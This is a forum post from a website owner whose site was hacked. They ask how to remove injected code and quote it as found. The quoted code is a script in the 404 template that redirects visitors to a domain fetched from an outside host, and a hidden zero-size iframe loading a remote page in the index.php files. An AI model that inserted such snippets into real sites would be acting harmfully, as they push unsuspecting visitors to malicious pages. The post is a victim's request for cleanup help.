My site was hacked at 6 am this morning. I noticed a few other people (asking questions here), and it looks like they have the same problem.
If you look in the 404 file, you'll find this
<script>location='http://scan.<?php echo file_get_contents('http://borntobebest.biz/actual_domain.txt'); ?>/vista1/6/48017/';</script><?php get_header(); ?>
As well as this in ALL of the index.php files (this i'm not 100% sure is hack related)
<div id="content"> <div id="main"> <div class="content"><div class="cont-r"><div class="cont-l"><div class="cont-bot"> <div class="grad-hack"><div class="begin"></div>
<iframe src="http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
My question is this: how the hell do I undo this? Do I need to scrub the PHP manually? I'm not even sure how to DO that. Can I just open them in notepad and take out the code?
Yes, I've updated everything and changed all passwords, looked for weird plugins/widgets, and removed users. I'm afraid that the thing has wormed it's way in, though.
I've put up at temp plain HTML file for now at steampunkwallpaper.com, just so nobody gets whatever the hack is pushing.